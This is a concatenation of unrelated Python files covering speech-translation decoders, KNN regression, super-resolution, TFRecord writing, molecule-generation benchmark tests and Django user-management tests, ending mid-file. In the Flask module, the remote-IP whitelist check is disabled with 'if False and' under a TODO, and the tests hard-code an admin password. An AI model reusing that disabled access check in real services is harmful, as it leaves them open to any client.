from espnet.nets.pytorch_backend.transformer.positionwise_feed_forward import PositionwiseFeedForward
from espnet.nets.pytorch_backend.transformer.repeat import repeat
from espnet.nets.scorer_interface import ScorerInterface
from espnet.nets.pytorch_backend.transformer.adapter import Adapter
class DualDecoder(ScorerInterface, torch.nn.Module):
"""Transfomer decoder module.
:param int odim: output dim
:param int attention_dim: dimention of attention
:param int attention_heads: the number of heads of multi head attention
:param int linear_units: the number of units of position-wise feed forward
:param int num_blocks: the number of decoder blocks
:param float dropout_rate: dropout rate
:param float attention_dropout_rate: dropout rate for attention
:param str or torch.nn.Module input_layer: input layer type
:param bool use_output_layer: whether to use output layer
:param class pos_enc_class: PositionalEncoding or ScaledPositionalEncoding
:param bool normalize_before: whether to use layer_norm before the first block
:param bool concat_after: whether to concat attention layer's input and output
if True, additional linear will be applied. i.e. x -> x + linear(concat(x, att(x)))
if False, no additional linear will be applied. i.e. x -> x + att(x)
"""
def __init__(self,
odim_tgt,
odim_src,
attention_dim=256,
attention_heads=4,
linear_units=2048,
num_blocks=6,
dropout_rate=0.1,
positional_dropout_rate=0.1,
self_attention_dropout_rate=0.0,
src_attention_dropout_rate=0.0,
input_layer="embed",
use_output_layer=True,
pos_enc_class=PositionalEncoding,
normalize_before=True,
concat_after=False,
cross_operator=None,
cross_weight_learnable=False,
cross_weight=0.0,
cross_self=False,
cross_src=False,
cross_to_asr=True,
cross_to_st=True,
adapter_names=None,
reduction_factor=8,
):
"""Construct an Decoder object."""
torch.nn.Module.__init__(self)
if input_layer == "embed":
self.embed = torch.nn.Sequential(
torch.nn.Embedding(odim_tgt, attention_dim),
pos_enc_class(attention_dim, positional_dropout_rate)
)
self.embed_asr = torch.nn.Sequential(
torch.nn.Embedding(odim_src, attention_dim),
pos_enc_class(attention_dim, positional_dropout_rate)
)
elif input_layer == "linear":
self.embed = torch.nn.Sequential(
torch.nn.Linear(odim_tgt, attention_dim),
torch.nn.LayerNorm(attention_dim),
torch.nn.Dropout(dropout_rate),
torch.nn.ReLU(),
pos_enc_class(attention_dim, positional_dropout_rate)
)
self.embed_asr = torch.nn.Sequential(
torch.nn.Linear(odim_src, attention_dim),
torch.nn.LayerNorm(attention_dim),
torch.nn.Dropout(dropout_rate),
torch.nn.ReLU(),
pos_enc_class(attention_dim, positional_dropout_rate)
)
elif isinstance(input_layer, torch.nn.Module):
self.embed = torch.nn.Sequential(
input_layer,
pos_enc_class(attention_dim, positional_dropout_rate)
)
self.embed_asr = torch.nn.Sequential(
input_layer,
pos_enc_class(attention_dim, positional_dropout_rate)
)
else:
raise NotImplementedError("only `embed` or torch.nn.Module is supported.")
self.normalize_before = normalize_before
self.adapter_names = adapter_names
self.dual_decoders = repeat(
num_blocks,
lambda: DualDecoderLayer(
attention_dim, attention_dim,
MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate),
MultiHeadedAttention(attention_heads, attention_dim, src_attention_dropout_rate),
PositionwiseFeedForward(attention_dim, linear_units, dropout_rate),
MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate),
MultiHeadedAttention(attention_heads, attention_dim, src_attention_dropout_rate),
PositionwiseFeedForward(attention_dim, linear_units, dropout_rate),
cross_self_attn=MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate) if (cross_self and cross_to_st) else None,
cross_self_attn_asr=MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate) if (cross_self and cross_to_asr) else None,
cross_src_attn=MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate) if (cross_src and cross_to_st) else None,
cross_src_attn_asr=MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate) if (cross_src and cross_to_asr) else None,
dropout_rate=dropout_rate,
normalize_before=normalize_before,
concat_after=concat_after,
cross_operator=cross_operator,
cross_weight_learnable=cross_weight_learnable,
cross_weight=cross_weight,
cross_to_asr=cross_to_asr,
cross_to_st=cross_to_st,
adapters=nn.ModuleDict({k: Adapter(attention_dim, attention_dim//reduction_factor)
for k in adapter_names}) if adapter_names else None,
)
)
if self.normalize_before:
self.after_norm = LayerNorm(attention_dim)
self.after_norm_asr = LayerNorm(attention_dim)
if use_output_layer:
self.output_layer = torch.nn.Linear(attention_dim, odim_tgt)
self.output_layer_asr = torch.nn.Linear(attention_dim, odim_src)
else:
self.output_layer = None
self.output_layer_asr = None
def forward(self, tgt, tgt_mask, tgt_asr, tgt_mask_asr,
memory, memory_mask,
cross_mask, cross_mask_asr,
cross_self=False, cross_src=False,
cross_self_from="before-self", cross_src_from="before-src"):
"""Forward decoder.
:param torch.Tensor tgt: input token ids, int64 (batch, maxlen_out) if input_layer == "embed"
input tensor (batch, maxlen_out, #mels) in the other cases
:param torch.Tensor tgt_mask: input token mask, (batch, maxlen_out)
            dtype=torch.uint8 in PyTorch < 1.2
            dtype=torch.bool in PyTorch >= 1.2
:param torch.Tensor memory: encoded memory, float32 (batch, maxlen_in, feat)
:param torch.Tensor memory_mask: encoded memory mask, (batch, maxlen_in)
            dtype=torch.uint8 in PyTorch < 1.2
            dtype=torch.bool in PyTorch >= 1.2
:return x: decoded token score before softmax (batch, maxlen_out, token) if use_output_layer is True,
final block outputs (batch, maxlen_out, attention_dim) in the other cases
:rtype: torch.Tensor
:return tgt_mask: score mask before softmax (batch, maxlen_out)
:rtype: torch.Tensor
"""
x = self.embed(tgt)
x_asr = self.embed_asr(tgt_asr)
if self.adapter_names:
lang_id = str(tgt[:, 0:1][0].item())
else:
lang_id = None
x, tgt_mask, x_asr, tgt_mask_asr, memory, memory_mask, _, _, _, _, _, _ = self.dual_decoders(x, tgt_mask, x_asr, tgt_mask_asr,
memory, memory_mask, cross_mask, cross_mask_asr,
cross_self, cross_src, cross_self_from, cross_src_from,
lang_id)
if self.normalize_before:
x = self.after_norm(x)
x_asr = self.after_norm_asr(x_asr)
if self.output_layer is not None:
x = self.output_layer(x)
x_asr = self.output_layer_asr(x_asr)
return x, tgt_mask, x_asr, tgt_mask_asr
def forward_one_step(self, tgt, tgt_mask,
tgt_asr, tgt_mask_asr,
memory,
cross_mask=None, cross_mask_asr=None,
cross_self=False, cross_src=False,
cross_self_from="before-self", cross_src_from="before-src",
cache=None, cache_asr=None):
"""Forward one step.
:param torch.Tensor tgt: input token ids, int64 (batch, maxlen_out)
:param torch.Tensor tgt_mask: input token mask, (batch, maxlen_out)
            dtype=torch.uint8 in PyTorch < 1.2
            dtype=torch.bool in PyTorch >= 1.2
:param torch.Tensor memory: encoded memory, float32 (batch, maxlen_in, feat)
:param List[torch.Tensor] cache: cached output list of (batch, max_time_out-1, size)
:return y, cache: NN output value and cache per `self.decoders`.
`y.shape` is (batch, maxlen_out, token)
:rtype: Tuple[torch.Tensor, List[torch.Tensor]]
"""
x = self.embed(tgt)
x_asr = self.embed_asr(tgt_asr)
if cache is None:
cache = self.init_state()
if cache_asr is None:
cache_asr = self.init_state()
new_cache = []
new_cache_asr = []
for c, c_asr, dual_decoder in zip(cache, cache_asr, self.dual_decoders):
x, tgt_mask, x_asr, tgt_mask_asr, memory, _, _, _, _, _, _, _ = dual_decoder(x, tgt_mask, x_asr, tgt_mask_asr,
memory, None, cross_mask, cross_mask_asr,
cross_self, cross_src,
cross_self_from, cross_src_from,
cache=c, cache_asr=c_asr)
new_cache.append(x)
new_cache_asr.append(x_asr)
if self.normalize_before:
y = self.after_norm(x[:, -1])
y_asr = self.after_norm_asr(x_asr[:, -1])
else:
y = x[:, -1]
y_asr = x_asr[:, -1]
if self.output_layer is not None:
y = torch.log_softmax(self.output_layer(y), dim=-1)
y_asr = torch.log_softmax(self.output_layer_asr(y_asr), dim=-1)
return y, new_cache, y_asr, new_cache_asr
# beam search API (see ScorerInterface)
def init_state(self, x=None):
"""Get an initial state for decoding."""
return [None for i in range(len(self.dual_decoders))]
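# Construction sketch (hypothetical vocabulary sizes; every other argument is left
# at its default):
#     dual_decoder = DualDecoder(odim_tgt=5000, odim_src=3000)
# forward() then takes target/ASR token ids, their masks, the encoder memory and the
# cross-attention masks, and returns (x, tgt_mask, x_asr, tgt_mask_asr); see the
# docstrings above for the expected tensor shapes and dtypes.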
|
import numpy as np
from math import sqrt
import pandas as pd
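# KNN regression with inverse-distance-squared weighting: the prediction for a query
# is sum_i(w_i * y_i) / sum_i(w_i), where w_i = 1 / d_i**2 and the sum runs over the
# k nearest training points under the chosen distance (Euclidean or Manhattan).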
class KNN_regresion_Jose:
# Initialize class variables
def __init__(self, file_name):
# Read from data set to a numpy array
self.data_set_reg = np.genfromtxt(file_name, delimiter=',')
self.entries_data = np.shape(self.data_set_reg)[0]
self.len_data = np.shape(self.data_set_reg[0])[0]
self.testing_data_set = None
self.len_test_data = None
# DISTANCE FORMULA FUNCTIONS
# Calculates the euclidean distance between 2 vectors
def distance_euclidean(self, c: "Int", target) -> "Double":
return np.sqrt(np.sum(np.square(np.subtract(target[:self.len_data - 1], self.data_set_reg[c, :self.len_data - 1]))))
# Calculates the manhattan distance between 2 vectors
def distance_manhattan(self, c: "Int", target) -> "Double":
return np.sum(np.abs(np.subtract(target[:self.len_data - 1], self.data_set_reg[c, :self.len_data - 1])))
# FUNCTION SETTERS
def _set_k(self, k_measure: "string") -> "None":
switcher = {
'static-3': 3,
'static-10': 10,
'static-15': 15,
            'squared': int(np.round(np.sqrt(self.entries_data))),
            'n-fold': int(np.round(self.entries_data / self.len_test_data)) + 1
}
self.k = switcher.get(k_measure)
# This method switches the distance calculating parameter depending on passing parameter.
def _set_distance(self, distance: "string") -> "None":
switcher = {
'euclidean': self.distance_euclidean,
'manhattan': self.distance_manhattan
}
self.applier_distance = switcher.get(distance)
def value_regression(self, query_target):
# Create a Series with indexes of data set to be calculated
predicted_values = pd.Series(range(self.entries_data))
# Calculate the distance between each entry in the data set and the query target
distances_computed = predicted_values.apply(lambda f: self.applier_distance(f, query_target))
# Obtain the indexes corresponding with the closest distances
sorted_distances = np.argsort(distances_computed)
# Calculate the formula for regression
counted_distances = 0
computed_distances = 0
for i in sorted_distances[:self.k]:
distance = 1/np.square(distances_computed[i])
counted_distances += distance
computed_distances += distance * self.data_set_reg[i, self.len_data - 1]
return computed_distances / counted_distances
def test_accuracy(self, file, k_set, distance):
# Get the values of the testing data set
self.testing_data_set = np.genfromtxt(file, delimiter=',')
self.len_test_data = np.shape(self.testing_data_set)[0]
# Set the K and distance to calculate
self._set_k(k_set)
self._set_distance(distance)
# Get the average of the true values
average_total = np.mean(self.testing_data_set[:, self.len_data - 1], dtype=np.float64)
# Calculate the squared residuals and the sum of squares
squared_residuals = 0
sum_of_squares = 0
for x in range(self.len_test_data):
predicted_value = self.value_regression(self.testing_data_set[x])
squared_residuals += np.square(predicted_value - self.testing_data_set[x, self.len_data - 1])
sum_of_squares += np.square(average_total - self.testing_data_set[x, self.len_data - 1])
# Final R squared
r_squared = 1 - (squared_residuals / sum_of_squares)
# Print results obtained
print('The R squared is {:f}.'.format(r_squared))
print('The parameters used are: K {0} and distance {1}.\n\n'.format(k_set, distance))
dert = KNN_regresion_Jose('regressionData/trainingData.csv')
for k in ['static-3', 'static-10', 'static-15', 'squared', 'n-fold']:
for tech in ['euclidean', 'manhattan']:
dert.test_accuracy('regressionData/testData.csv', k, tech)
|
"""Tests runner.py module."""
from __future__ import print_function
import unittest
from mock import patch
import test_runners.tf_models.runner as runner
class TestRunBenchmark(unittest.TestCase):
"""Tests for runner.py module."""
@patch('test_runners.tf_models.runner.TestRunner.run_test_suite')
@patch('test_runners.tf_models.runner.TestRunner._make_log_dir')
def test_resnet50_256_gpu_1_real_fp16(self, _, run_test_suite_mock):
"""Tests init TestRunner and running a mocked single gpu test."""
run = runner.TestRunner('/workspace', '/workspace/git/tf_models')
run.resnet50_256_gpu_1_real_fp16()
test_config = run_test_suite_mock.call_args[0][0]
# check GPU args and count
self.assertEqual(test_config['gpus'], 1)
self.assertEqual(test_config['batch_size'], 256)
self.assertEqual(test_config['args']['batch_size'], 256)
self.assertEqual(test_config['args']['dtype'], 'fp16')
self.assertEqual(test_config['test_id'],
'official.resnet50.gpu_1.256.fp16.real')
self.assertIn('model', test_config)
@patch('test_runners.tf_models.runner.TestRunner.run_test_suite')
@patch('test_runners.tf_models.runner.TestRunner._make_log_dir')
def test_resnet50_128_gpu_8_real(self, _, run_test_suite_mock):
"""Tests init TestRunner and running a mocked single gpu test."""
run = runner.TestRunner('/workspace', '/workspace/git/tf_models')
run.resnet50_128_gpu_8_real()
test_config = run_test_suite_mock.call_args[0][0]
# check GPU args and count
self.assertEqual(test_config['gpus'], 8)
self.assertEqual(test_config['batch_size'], 128)
self.assertEqual(test_config['args']['data_dir'], '/data/imagenet')
self.assertEqual(test_config['args']['batch_size'], 8*128)
self.assertEqual(test_config['args']['resnet_version'], 1)
self.assertEqual(test_config['args']['dtype'], 'fp32')
self.assertEqual(test_config['test_id'], 'official.resnet50.gpu_8.128.real')
self.assertIn('model', test_config)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 1/22/2019 11:52 AM
# @Author : Xiang Chen (Richard)
# @File : label_data_tfrecord.py
# @Software: PyCharm
import tensorflow as tf
import os
import numpy as np
from PIL import Image
IMAGE_PATH = '/home/ucesxc0/richard/AIS_data_Danish/tianjin_image_result/'
IMAGE_LABEL_PATH = '/home/ucesxc0/richard/AIS_data_Danish/tianjin_image_result/'
train_label = []
test_label = []
# open files
with open(os.path.join(IMAGE_LABEL_PATH, 'label.txt')) as f:
i = 1
for line in f.readlines():
if i % 20 == 0:
test_label.append(line)
else:
train_label.append(line)
i += 1
np.random.shuffle(train_label)
np.random.shuffle(test_label)
# transfer the labels
def int_to_one_hot(labels):
    # Labels arrive as strings from the comma-separated lines; cast to int so that
    # '-1' is recognised as the negative class.
    label = []
    if int(labels[0]) == -1:
        label.append([0, 0, 0])
    else:
        label.append([1, 0, 0])
    if int(labels[1]) == -1:
        label.append([0, 0, 0])
    else:
        label.append([0, 1, 0])
    if int(labels[2]) == -1:
        label.append([0, 0, 0])
    else:
        label.append([0, 0, 1])
    return label
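# Serialize each (image, labels) entry into a tf.train.Example (one bytes feature for
# the raw image and one int64 one-hot feature per label) and write it to a TFRecord file.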
def image_to_tfrecords(label_list, tf_record_path):
    tf_write = tf.python_io.TFRecordWriter(tf_record_path)
    for item in label_list:
        item = item.strip('\n')
items = item.split(',')
image_name = items[0]
image_path = os.path.join(IMAGE_PATH, image_name)
if os.path.isfile(image_path):
image = Image.open(image_path)
image = image.tobytes()
features = {}
features['raw_image'] = tf.train.Feature(
bytes_list=tf.train.BytesList(value=[image]))
labels = int_to_one_hot(items[1:])
features['label_1'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=labels[0]))
features['label_2'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=labels[1]))
features['label_3'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=labels[2]))
tf_features = tf.train.Features(feature=features)
example = tf.train.Example(features=tf_features) # protocol buffer
tf_serialized = example.SerializeToString()
tf_write.write(tf_serialized)
else:
print("not")
tf_write.close()
image_to_tfrecords(train_label,
'/home/ucesxc0/Scratch/output/training_CNN_new_dataset/train.tfrecords')
image_to_tfrecords(test_label,
'/home/ucesxc0/Scratch/output/training_CNN_new_dataset/test.tfrecords')
|
import tensorflow as tf
from .model import Model
class SRCNN(Model):
def __init__(self, args):
super().__init__(args)
self._prediction_offset = 6
self._lr_offset = self._prediction_offset // self._scale_factor
def get_data(self):
data_batch, initializer = self.dataset.get_data()
lr_batch = tf.cast(data_batch['lr1'], tf.float32) / 255.0
hr_batch = tf.cast(data_batch['hr'], tf.float32) / 255.0
return [lr_batch, hr_batch], initializer
def get_placeholder(self):
input_ph = tf.placeholder(tf.float32, shape=[1, None, None, 1], name="x")
return [input_ph]
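    # load_model below builds the standard SRCNN pipeline: bicubic upscaling of the
    # low-resolution batch followed by 9x9 -> 1x1 -> 5x5 'valid' convolutions
    # (feature extraction, non-linear mapping, reconstruction), with the last layer
    # trained at a 0.1 learning-rate multiplier.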
def load_model(self, data_batch):
lr_batch = data_batch[0]
with tf.variable_scope('srcnn'):
if self._using_dataset:
net = tf.image.resize_bicubic(lr_batch, (self._scale_factor * lr_batch.shape[1],
self._scale_factor * lr_batch.shape[2]), align_corners=True)
else:
net = tf.pad(lr_batch, [[0, 0], [6, 6], [6, 6], [0, 0]], 'SYMMETRIC')
net = tf.layers.conv2d(net, 64, 9, activation=tf.nn.relu, padding='valid', name='conv1',
kernel_initializer=tf.keras.initializers.he_normal())
net = tf.layers.conv2d(net, 32, 1, activation=tf.nn.relu, padding='valid', name='conv2',
kernel_initializer=tf.keras.initializers.he_normal())
net = tf.layers.conv2d(net, 1, 5, activation=tf.nn.relu, padding='valid',
name='conv3', kernel_initializer=tf.keras.initializers.he_normal())
predicted_batch = tf.maximum(net, 0.0)
srcnn_variables = tf.trainable_variables(scope='srcnn')
for variable in srcnn_variables:
if 'conv3' in variable.name:
self.lr_multipliers[variable.name] = 0.1
else:
self.lr_multipliers[variable.name] = 1.0
if self._using_dataset:
tf.summary.image('Low_resolution',
data_batch[0][:, self._lr_offset:-self._lr_offset, self._lr_offset:-self._lr_offset],
max_outputs=self._save_num)
tf.summary.image('High_resolution',
data_batch[1][:, self._prediction_offset:-self._prediction_offset,
self._prediction_offset:-self._prediction_offset],
max_outputs=self._save_num)
tf.summary.image('High_resolution_prediction', predicted_batch, max_outputs=self._save_num)
return predicted_batch
def get_loss(self, data_batch, predicted_batch):
loss = tf.losses.mean_squared_error(
data_batch[1][:,
self._prediction_offset:-self._prediction_offset,
self._prediction_offset:-self._prediction_offset],
predicted_batch)
tf.summary.scalar('MSE', loss)
tf.summary.scalar('PSNR', tf.reduce_mean(tf.image.psnr(
data_batch[1][:,
self._prediction_offset:-self._prediction_offset,
self._prediction_offset:-self._prediction_offset],
predicted_batch,
max_val=1.0)))
tf.summary.scalar('SSIM', tf.reduce_mean(tf.image.ssim(
data_batch[1][:,
self._prediction_offset:-self._prediction_offset,
self._prediction_offset:-self._prediction_offset],
predicted_batch,
max_val=1.0)))
return loss
def calculate_metrics(self, data_batch, predicted_batch):
diff = data_batch[1][:, self._prediction_offset:-self._prediction_offset,
self._prediction_offset:-self._prediction_offset] - predicted_batch
diff_sqr = tf.square(diff)
mse = ('MSE', tf.reduce_mean(diff_sqr, axis=[1, 2, 3]))
psnr = ('PSNR', tf.squeeze(tf.image.psnr(
data_batch[1][:,
self._prediction_offset:-self._prediction_offset,
self._prediction_offset:-self._prediction_offset],
predicted_batch,
max_val=1.0)))
ssim = ('SSIM', tf.squeeze(tf.image.ssim(
data_batch[1][:,
self._prediction_offset:-self._prediction_offset,
self._prediction_offset:-self._prediction_offset],
predicted_batch,
max_val=1.0)))
return [mse, psnr, ssim]
|
from . import app
from flask import abort, request
import socket
def resolve_dns(domain_name):
try:
return socket.gethostbyname(domain_name)
except socket.gaierror as e:
return None
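# whitelist_ips() yields the currently resolvable IPs for the configured DNS names;
# hostnames that fail to resolve are silently skipped.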
def whitelist_ips():
return (ip
for ip in (resolve_dns(dns) for dns in app.config['DNS_WHITELIST'])
if ip is not None)
@app.before_request
def verify_secret_key():
try:
secret_key = request.view_args['secret_key']
except (KeyError, TypeError):
return abort(404)
if secret_key != app.config['SECRET_KEY']:
app.logger.warning('invalid secret key: %s', secret_key)
return abort(403)
@app.before_request
def limit_remote_addr():
# TODO: whitelist pivotal urls
if False and request.remote_addr not in whitelist_ips():
app.logger.warning('remote_addr(%s) not whitelisted. whitelist: %r',
request.remote_addr, list(whitelist_ips()))
abort(403)
app.logger.info('request accepted from %s', request.remote_addr)
|
from django.apps import AppConfig
class VoaConfig(AppConfig):
name = 'voa'
|
# An example of valid but badly formatted code
x = 12
if x== 24:
print('Is valid')
else:
print("Is not valid")
def helper(name='sample'):
pass
def another( name = 'sample'):
pass
print()
# Docstring example
def print_hello(name: str) -> str:
"""
Greets the user by name
Parameters
name(str): The name of the user
Returns
str: The greeting
"""
print('Hello,' + name)
print_hello('heisenberg')
|
from ..functions.plural_word import plural_word
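# Polish time units: 'godzin' (hours), 'minut' (minutes), 'sekund' (seconds);
# plural_word picks the grammatical form ('-ę' for one, '-y' for a few, bare stem
# for many) that matches the rounded number.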
def plural_time(number: int) -> str:
if number >= 3600:
number //= 3600
unit = 'godzin'
elif number >= 60:
number //= 60
unit = 'minut'
else:
unit = 'sekund'
return plural_word(number, one=unit + 'ę', few=unit + 'y', many=unit)
|
from guacamol.distribution_learning_benchmark import ValidityBenchmark, UniquenessBenchmark, NoveltyBenchmark, \
KLDivBenchmark
from guacamol.assess_distribution_learning import _assess_distribution_learning
from .mock_generator import MockGenerator
import numpy as np
import tempfile
from os.path import join
def test_validity_does_not_penalize_duplicates():
generator = MockGenerator(['CCC', 'CCC'])
benchmark = ValidityBenchmark(number_samples=2)
assert benchmark.assess_model(generator).score == 1.0
def test_validity_score_is_proportion_of_valid_molecules():
generator = MockGenerator(['CCC', 'CC(CC)C', 'invalidMolecule'])
benchmark = ValidityBenchmark(number_samples=3)
assert benchmark.assess_model(generator).score == 2.0 / 3.0
def test_uniqueness_penalizes_duplicates():
generator = MockGenerator(['CCC', 'CCC', 'CCC'])
benchmark = UniquenessBenchmark(number_samples=3)
assert benchmark.assess_model(generator).score == 1.0 / 3.0
def test_uniqueness_penalizes_duplicates_with_different_smiles_strings():
generator = MockGenerator(['C(O)C', 'CCO', 'OCC'])
benchmark = UniquenessBenchmark(number_samples=3)
assert benchmark.assess_model(generator).score == 1.0 / 3.0
def test_uniqueness_does_not_penalize_invalid_molecules():
generator = MockGenerator(['C(O)C', 'invalid1', 'invalid2', 'CCC', 'NCCN'])
benchmark = UniquenessBenchmark(number_samples=3)
assert benchmark.assess_model(generator).score == 1.0
def test_novelty_score_is_zero_if_no_molecule_is_new():
molecules = ['CCOCC', 'NNNNONNN', 'C=CC=C']
generator = MockGenerator(molecules)
benchmark = NoveltyBenchmark(number_samples=3, training_set=molecules)
assert benchmark.assess_model(generator).score == 0.0
def test_novelty_score_is_one_if_all_molecules_are_new():
generator = MockGenerator(['CCOCC', 'NNNNONNN', 'C=CC=C'])
benchmark = NoveltyBenchmark(number_samples=3, training_set=['CO', 'CC'])
assert benchmark.assess_model(generator).score == 1.0
def test_novelty_score_does_not_penalize_duplicates():
generator = MockGenerator(['CCOCC', 'O(CC)CC', 'C=CC=C', 'CC'])
benchmark = NoveltyBenchmark(number_samples=3, training_set=['CO', 'CC'])
# Gets 2 out of 3: one of the duplicated molecules is ignored, so the sampled molecules are
# ['CCOCC', 'C=CC=C', 'CC'], and 'CC' is not novel
assert benchmark.assess_model(generator).score == 2.0 / 3.0
def test_novelty_score_penalizes_invalid_molecules():
generator = MockGenerator(['CCOCC', 'invalid1', 'invalid2', 'CCCC', 'CC'])
benchmark = NoveltyBenchmark(number_samples=3, training_set=['CO', 'CC'])
assert benchmark.assess_model(generator).score == 2.0 / 3.0
def test_KLdiv_benchmark_same_dist():
generator = MockGenerator(['CCOCC', 'NNNNONNN', 'C=CC=C'])
benchmark = KLDivBenchmark(number_samples=3, training_set=['CCOCC', 'NNNNONNN', 'C=CC=C'])
result = benchmark.assess_model(generator)
print(result.metadata)
assert np.isclose(result.score, 1.0, )
def test_KLdiv_benchmark_different_dist():
generator = MockGenerator(['CCOCC', 'NNNNONNN', 'C=CC=C'])
benchmark = KLDivBenchmark(number_samples=3, training_set=['FCCOCC', 'CC(CC)CCCCNONNN', 'C=CC=O'])
result = benchmark.assess_model(generator)
print(result.metadata)
assert result.metadata['number_samples'] == 3
assert result.metadata.get('kl_divs') is not None
assert result.metadata['kl_divs'].get('BertzCT') > 0
assert result.metadata['kl_divs'].get('MolLogP', None) > 0
assert result.metadata['kl_divs'].get('MolWt', None) > 0
assert result.metadata['kl_divs'].get('TPSA', None) > 0
assert result.metadata['kl_divs'].get('NumHAcceptors', None) > 0
assert result.metadata['kl_divs'].get('NumHDonors', None) > 0
assert result.metadata['kl_divs'].get('NumRotatableBonds', None) > 0
assert result.score < 1.0
def test_distribution_learning_suite_v1():
generator = MockGenerator(
['CCl', 'CCOCCCl', 'ClCCF', 'CCCOCCOCCCO', 'CF', 'CCOCC', 'CCF', 'CCCOCC', 'NNNNONNN', 'C=CC=C'] * 10)
mock_chembl = ['FCCOCC', 'C=CC=O', 'CCl', 'CCOCCCl', 'ClCCF', 'CCCOCCOCCCO', 'CF', 'CCOCC',
'CCF']
temp_dir = tempfile.mkdtemp()
smiles_path = join(temp_dir, 'mock.smiles')
with open(smiles_path, 'w') as f:
for i in mock_chembl:
f.write(f'{i}\n')
f.close()
json_path = join(temp_dir, 'output.json')
_assess_distribution_learning(model=generator,
chembl_training_file=smiles_path,
json_output_file=json_path,
benchmark_version='v1',
number_samples=4)
with open(json_path, 'r') as f:
print(f.read())
|
# -*- coding: utf-8 -*-
from django.test import TestCase, Client
from django.urls import reverse
import json
from loginSystem.models import Administrator, ACL
from plogical.CyberCPLogFileWriter import CyberCPLogFileWriter as logging
# Create your tests here.
class TestUserManagement(TestCase):
def setUp(self):
## Initiate Client
self.client = Client()
self.adminLogin = reverse('adminLogin')
self.verifyLogin = reverse('verifyLogin')
## Create Login User
response = self.client.get(self.adminLogin)
#
self.assertTemplateUsed(response, 'loginSystem/login.html')
self.submitUserCreation = reverse('submitUserCreation')
self.submitUserDeletion = reverse('submitUserDeletion')
self.saveModifications = reverse('saveModifications')
self.fetchUserDetails = reverse('fetchUserDetails')
self.saveResellerChanges = reverse('saveResellerChanges')
self.createACLFunc = reverse('createACLFunc')
self.deleteACLFunc = reverse('deleteACLFunc')
self.submitACLModifications = reverse('submitACLModifications')
self.saveChangesAPIAccess = reverse('saveChangesAPIAccess')
## Verify login
data_ret = {'username': 'admin', 'password': '1234567'}
json_data = json.dumps(data_ret)
response = self.client.post(self.verifyLogin, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['loginStatus'], 1)
def test_submitUserCreation(self):
## Login
data_ret = {'firstName': 'Usman', 'lastName': 'Nasir', 'email': 'usman@cyberpersons.com', 'userName': 'usman',
'password': '1234567', 'websitesLimit': 50, 'selectedACL':'user', 'securityLevel': 'HIGH'}
json_data = json.dumps(data_ret)
response = self.client.post(self.submitUserCreation, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
self.assertEqual(json_data['createStatus'], 1)
self.assertEqual(Administrator.objects.filter(userName='usman').count(), 1)
def test_submitUserDeletion(self):
self.test_submitUserCreation()
data_ret = {'accountUsername': 'usman'}
json_data = json.dumps(data_ret)
response = self.client.post(self.submitUserDeletion, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
self.assertEqual(json_data['deleteStatus'], 1)
self.assertEqual(Administrator.objects.filter(userName='usman').count(), 0)
def test_saveModifications(self):
self.test_submitUserCreation()
data_ret = {'accountUsername': 'usman','firstName': 'Rehan', 'lastName': 'Nasir', 'email': 'usman@cyberpersons.com',
'securityLevel': "LOW", 'password': '1234567'}
json_data = json.dumps(data_ret)
## Modification
response = self.client.post(self.saveModifications, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
self.assertEqual(json_data['saveStatus'], 1)
## Check Modification
# response = self.client.post(self.fetchUserDetails, json_data, content_type="application/json")
# logging.writeToFile(response.content)
# json_data = json.loads(response.content)
self.assertEqual(Administrator.objects.get(userName='usman').firstName, 'Rehan')
self.assertEqual(Administrator.objects.get(userName='usman').lastName, 'Nasir')
self.assertEqual(Administrator.objects.get(userName='usman').securityLevel, 1)
    def test_saveResellerChanges(self):
self.test_submitUserCreation()
data_ret = {'newOwner': 'admin', 'userToBeModified':'usman', 'websitesLimit': 100}
json_data = json.dumps(data_ret)
## Modification
response = self.client.post(self.saveResellerChanges, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
## Check Modification
# response = self.client.post(self.fetchUserDetails, json_data, content_type="application/json")
# logging.writeToFile(response.content)
# json_data = json.loads(response.content)
self.assertEqual(Administrator.objects.get(userName='usman').initWebsitesLimit, 100)
def test_createACLFunc(self):
data_ret = {'aclName': 'hello', 'makeAdmin':1,
'createNewUser': 1,
'versionManagement': 1,
'listUsers': 1,
'resellerCenter': 1,
'deleteUser': 1,
'changeUserACL': 1,
'createWebsite': 1,
'modifyWebsite': 1,
'suspendWebsite': 1,
'deleteWebsite': 1,
'createPackage': 1,
'listPackages': 1,
'deletePackage': 1,
'modifyPackage': 1,
'createDatabase': 1,
'deleteDatabase': 1,
'listDatabases': 1,
'createNameServer': 1,
'createDNSZone': 1,
'deleteZone': 1,
'addDeleteRecords': 1,
'createEmail': 1,
'listEmails': 1,
'deleteEmail': 1,
'emailForwarding': 1,
'changeEmailPassword': 1,
'dkimManager': 1,
'createFTPAccount': 1,
'deleteFTPAccount': 1,
'listFTPAccounts': 1,
'createBackup': 1,
'restoreBackup': 1,
'addDeleteDestinations': 1,
'scheDuleBackups': 1,
'remoteBackups': 1,
'manageSSL': 1,
'hostnameSSL': 1,
'mailServerSSL': 1}
json_data = json.dumps(data_ret)
## Modification
response = self.client.post(self.createACLFunc, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
self.assertEqual(ACL.objects.filter(name='hello').count(), 1)
def test_deleteACLFunc(self):
self.test_createACLFunc()
data_ret = {'aclToBeDeleted': 'hello'}
json_data = json.dumps(data_ret)
response = self.client.post(self.deleteACLFunc, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
self.assertEqual(ACL.objects.filter(name='hello').count(), 0)
def test_submitACLModifications(self):
self.test_createACLFunc()
data_ret = {'aclToModify': 'hello',
'adminStatus':1,
